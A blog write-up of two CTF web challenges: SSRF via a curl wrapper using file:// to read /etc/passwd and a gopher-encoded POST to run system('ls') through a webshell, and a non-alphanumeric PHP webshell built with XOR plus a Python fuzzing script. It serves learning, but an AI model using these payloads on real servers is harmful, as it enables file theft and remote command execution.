ssrf xor trojan in ctf

I got these interesting problems from my qq group, I know something about ssrf but never using it in practice. The other is telling you how to make php trojan without A-Za-z0-9.

problem 1

url

http://oj.momomoxiaoxi.com:9090/

enter image description here

idea

As you see, the index.php do function that exec curl, it’s easy to get the point using the file:// which the php protocol, if the bug exist, we can get the system local file. Let’s try read the /etc/passwd. Cool, it works. so, the next step is getting the index.php and finding the flag.

enter image description here

Try to get the default path ‘/var/www/html/index.php’ emmm, there is no difference with before. Something is missing, so i scan the directory and find the robots.txt

enter image description here

enter image description here

enter image description here

visit the robots.txt i find a special php file is disallowed for spider, so the way to get flag must in the webshe11111111.php, using the payload ‘oj.momomoxiaoxi.com:9090/?url=file:///var/www/html/webshe11111111.php’ to get the content.

enter image description here

so, the condition for the flag is

$ip === $host’ &&
post ‘admin’ == ‘h1admin’

if we can meet these condition and we can use eval function in this page. The $hsot is 127.0.0.1 we can use index.php exist bug ‘ssrf’ visit the webshe11111111.php and POST parameter admin == h1admin through the gopher protocol. I made following payload to run system(‘ls’) and the use file:\\ to read the content.

1
_POST%2520/webshe11111111.php%2520HTTP/1.1%250D%250AHost%253A%2520localhost%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Macintosh%253B%2520Intel%2520Mac%2520OS%2520X%252010.13%253B%2520rv%253A55.0%2529%2520Gecko/20100101%2520Firefox/55.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%2520xml%252Capplication/xml%253Bq%253D0.9%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Cen-US%253Bq%253D0.5%252Cen%253Bq%253D0.3%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A34%250D%250ACookie%253A%2520UM_distinctid%253D1642129d3d99-0b998469c67d1e-49546d-8ca00-1642129d3da360%253B%2520CNZZDATA1260689686%253D1509604545-1529560176-%257C1529560176%250D%250ADNT%253A%25201%250D%250AConnection%253A%2520close%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A

enter image description here

enter image description here

file://

file:// — Accessing local filesystem

Filesystem_ is the default wrapper used with PHP and represents the local filesystem. When a relative path is specified (a path which does not begin with /, , \, or a Windows drive letter) the path provided will be applied against the current working directory. In many cases this is the directory in which the script resides unless it has been changed. Using the CLI sapi, this defaults to the directory from which the script was called.

problem 2

url

http://202.112.51.184:20001/

idea

This problem style is similar to. As you can see, we can use eval function without code [a-zA-Z0-9], so we should make some code like _ [ ] ! # etc…
to exec command. How to make it work? We know PHP is very flexible, such as “<” xor “{“ == “G”, so we can use python to fuzz such the special code make an effect equal

1
$_GET[_]($_GET[__]);

enter image description here

1
2
3
4
5
6
7
text='''
`/*-+.():;/?~!@#$%^&*()_[]\{\}<>,\
'''
for i in text:
for j in text:
if chr(ord(i)^ord(j)) in '_GET':
print i+'^'+j+' === '+chr(ord(i)^ord(j))

the final payload is

1
http://202.112.51.184:20001/?code=$_=%22~{{*%22^%22!%3C%3E~%22;${$_}[_](${$_}[__]);&_=getFlag&__=()

enter image description here

文章作者: Carl Star
文章链接: http://carlstar.club/2018/08/12/trouble/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Hexo